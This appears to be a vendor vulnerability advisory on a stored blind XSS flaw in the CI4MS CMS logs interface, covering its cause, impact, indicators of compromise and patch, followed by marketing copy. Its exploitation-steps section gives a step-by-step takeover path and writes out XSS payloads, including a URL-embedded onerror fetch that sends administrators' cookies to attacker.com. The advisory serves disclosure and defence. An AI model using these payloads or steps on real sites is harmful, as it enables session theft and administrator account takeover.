CVE-2026-34560: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34560 is a Stored DOM Blind XSS vulnerability in CI4MS (a CodeIgniter 4-based CMS skeleton) that allows low-privileged attackers to inject malicious JavaScript payloads into application logs, which execute in the browser context of administrators when they view the logs interface. The vulnerability affects all CI4MS versions up to and including 0.28.6.0, and was disclosed on March 31, 2026, with a patch released in version 0.31.0.0. It carries a CVSS v3.1 base score of 9.1 (Critical) (GitHub Advisory, GitHub Security Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-controlled input flowing into application logs is stored and later rendered without HTML entity encoding or output sanitization in the administrative logs interface. The attack exploits unsafe DOM manipulation methods (e.g., .html(), innerHTML) or server-side templating that renders raw log data, allowing injected payloads to execute as JavaScript. An attacker with low-level authenticated access can trigger logging of a malicious payload by accessing endpoints such as /backend/backup/restore/<img src=x onerror=alert(document.domain)>, which causes an application error that writes the unsanitized payload into logs. The "blind" nature of the attack means the attacker does not observe immediate execution — the payload fires only when an administrator navigates to /backend/logs/ (GitHub Advisory, GitHub Security Advisory).

Impact

Successful exploitation enables persistent, arbitrary JavaScript execution in the browser context of any administrator who views the logs page, leading to full administrator account takeover via session token theft, privilege escalation for lower-privileged users, and complete application compromise. Attackers can modify application configuration, create rogue admin accounts, or pivot to further attacks against the underlying infrastructure. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect the administrative security boundary (GitHub Advisory, GitHub Security Advisory).

Exploitability

A proof-of-concept exploit with concrete reproduction steps and a video PoC is publicly available in the GitHub Security Advisory, including specific vulnerable endpoints and XSS payloads (GitHub Security Advisory). There is no current evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.025% (8th percentile), indicating a low but non-negligible probability of exploitation in the near term. The vulnerability is not listed in the CISA KEV catalog at this time (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify a CI4MS instance running version ≤ 0.28.6.0 by examining HTTP response headers, page footers, or publicly accessible metadata that reveals the CMS version.
  2. Obtain low-privileged access: Register or authenticate as any low-privileged user on the target CI4MS application (the vulnerability requires only PR:L — low privileges).
  3. Inject XSS payload via a loggable endpoint: Send a crafted HTTP request to an endpoint that logs user-controlled input and triggers an application error. For example, navigate to /backend/backup/restore/<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>. The application logs the error including the unsanitized path segment.
  4. Payload stored in logs: The malicious XSS payload is written into the application's log storage without sanitization, persisting until an administrator views the logs.
  5. Wait for administrator interaction: The payload remains dormant ("blind") until an administrator navigates to /backend/logs/.
  6. Payload executes in admin context: When the administrator views the logs page, the stored payload executes automatically in their browser, exfiltrating session cookies or tokens to the attacker-controlled server.
  7. Account takeover: Using the stolen session token, the attacker authenticates as the administrator, achieving full application compromise and privilege escalation (GitHub Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from administrator browsers to unexpected external domains (e.g., attacker-controlled servers) originating from the /backend/logs/ page; unusual DNS lookups or beacon requests triggered during log viewing sessions.
  • Logs: Application log entries containing HTML tags, JavaScript event handlers (e.g., onerror=, onload=, <script>), or encoded XSS payloads within URL path segments, particularly in entries related to /backend/backup/restore/ or similar endpoints.
  • File System: Log files (e.g., writable/logs/*.log) containing raw, unsanitized HTML or JavaScript strings injected via URL parameters or path segments.
  • Process/Session: Unexpected administrator session activity following log page views, such as new admin account creation, configuration changes, or privilege modifications not initiated by the legitimate administrator (GitHub Security Advisory).

Mitigation and workarounds

Upgrade CI4MS to version 0.31.0.0 or later, which replaces the vulnerable log viewer with a secure internal LogViewer library and implements global input validation and enhanced XSS/CSRF protections (CI4MS Release). For organizations unable to patch immediately, restrict access to the /backend/logs/ interface to trusted administrators only via network-level controls, and deploy a Web Application Firewall (WAF) to filter XSS payloads in HTTP requests. Additionally, enforce HttpOnly and SameSite cookie attributes on session cookies to limit the impact of any successful XSS execution, and implement a strict Content Security Policy (CSP) header (GitHub Advisory).

Community reactions

The vulnerability was covered by The Hacker Wire, which published an article specifically on the CI4MS Blind XSS in the logs interface (The Hacker Wire). Social media mentions were observed on Mastodon and Bluesky shortly after disclosure, indicating moderate community awareness. No major vendor statements beyond the project maintainer's own advisory and patch release have been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management